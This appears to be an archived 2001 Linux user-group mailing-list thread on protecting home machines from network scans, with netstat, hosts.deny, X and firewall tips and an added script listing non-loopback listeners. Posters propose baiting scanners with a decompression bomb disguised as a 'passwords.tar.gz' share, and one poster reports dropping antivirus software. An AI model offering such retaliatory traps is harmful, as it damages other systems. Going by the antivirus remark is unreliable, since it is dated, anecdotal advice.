xsprite@bigfoot.com writes:
If you have a high amount of bandwidth, or your ISP provides a service such as cable, you are likely to get scanned (I do at least once every two days or so), whether the scan is for open netbios shares or the latest s'kiddie 0day.
My home dial-up machine gets scanned pretty much every evening for samba shares. I intend to develop a small samba share of poisoned files padded out with 0s (so they compress well and go up the modem fast).
Yes, don't let anything listen to the external interface unless absolutely necessary. netstat -a will show what's listening. inetd always seems to want to listen to everything, but you can use "ALL: ALL EXCEPT 127." in hosts.deny (man hosts_access) to pin that down to only the local machine (change to taste) for most services it starts. Commenting out some lines in /etc/X11/*/Xaccess is also good, as is running X with -nolisten tcp if you don't use that.
And use ipchains/iptables just to be sure.
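One way to act on the advice in the message above, as an added example that is not part of the original post: a filter over numeric `netstat -an` output (Linux net-tools column layout assumed) that reports sockets listening on anything other than loopback. The function name `external_listeners` and the sample output are constructed for illustration.

```shell
#!/bin/sh
# Usage on a live machine:  netstat -an | external_listeners
# Prints "proto address port" for every TCP socket in LISTEN state and
# every unconnected UDP socket that is NOT bound to a loopback address.

external_listeners() {
    awk '
    $1 ~ /^(tcp|udp)6?$/ {
        proto = $1; laddr = $4; foreign = $5; state = $6
        # TCP: only sockets in LISTEN. UDP has no state column; an
        # unconnected socket shows a wildcard foreign address.
        if (proto ~ /^tcp/ && state != "LISTEN") next
        if (proto ~ /^udp/ && foreign !~ /:\*$/) next
        # Split "addr:port" at the last colon so IPv6 addresses survive.
        port = laddr; sub(/^.*:/, "", port)
        addr = substr(laddr, 1, length(laddr) - length(port) - 1)
        # Loopback-only listeners are what the hosts.deny rule aims for.
        if (addr ~ /^127\./ || addr == "::1") next
        print proto, addr, port
    }'
}

# Constructed sample output (not captured from a real host).
SAMPLE_NETSTAT='Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 0.0.0.0:139             0.0.0.0:*               LISTEN
tcp        0      0 127.0.0.1:25            0.0.0.0:*               LISTEN
tcp        0      0 192.168.1.5:1042        192.168.1.1:80          ESTABLISHED
udp        0      0 0.0.0.0:137             0.0.0.0:*
tcp6       0      0 :::6000                 :::*                    LISTEN
tcp6       0      0 ::1:631                 :::*                    LISTEN'

# Demonstration run on the sample: flags the samba ports (139/tcp,
# 137/udp) and the X11 TCP listener (6000), skips the loopback ones.
printf '%s\n' "$SAMPLE_NETSTAT" | external_listeners
```

Anything this prints is reachable from the external interface unless a packet filter blocks it, so each line is a candidate for rebinding to loopback, disabling, or an ipchains/iptables rule.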
on Fri, Jun 22, 2001 at 12:49:23PM +0100, MJ Ray scribbled:
My home dial-up machine gets scanned pretty much every evening for samba shares. I intend to develop a small samba share of poisoned files padded out with 0s (so they compress well and go up the modem fast).
Try this uudecoded to passwords.tar.gz.. it's approximately 2 gigs after being expanded totally.. (from 594 bytes)
Fantastic idea, I like it.
Also whilst on the subject of virii, I have been using computers for over 10 years now and been on the net for most of those, and I have yet to catch a computer virus! I found that my virus checker software was the thing which crashed my PC the most, so I removed it. I don't worry too much about my security on this machine as it's behind the largest firewall in Europe (I think). But if you are a dial-up user then I would worry. Have a look at projects.honeynet.org/; it seems the half-life for a deadrat 6.2 box is 7.2 hours with the quickest at 15 minutes, scary.
I would recommend signing up for the Crypto-Gram from Bruce Schneier (author of Applied Cryptography); see www.counterpane.com.
Thanks
D
alug, the Anglian Linux User Group list Send list replies to alug@stu.uea.ac.uk http://www.anglian.lug.org.uk/ http://rabbit.stu.uea.ac.uk/cgi-bin/listinfo/alug See the website for instructions on digest or unsub!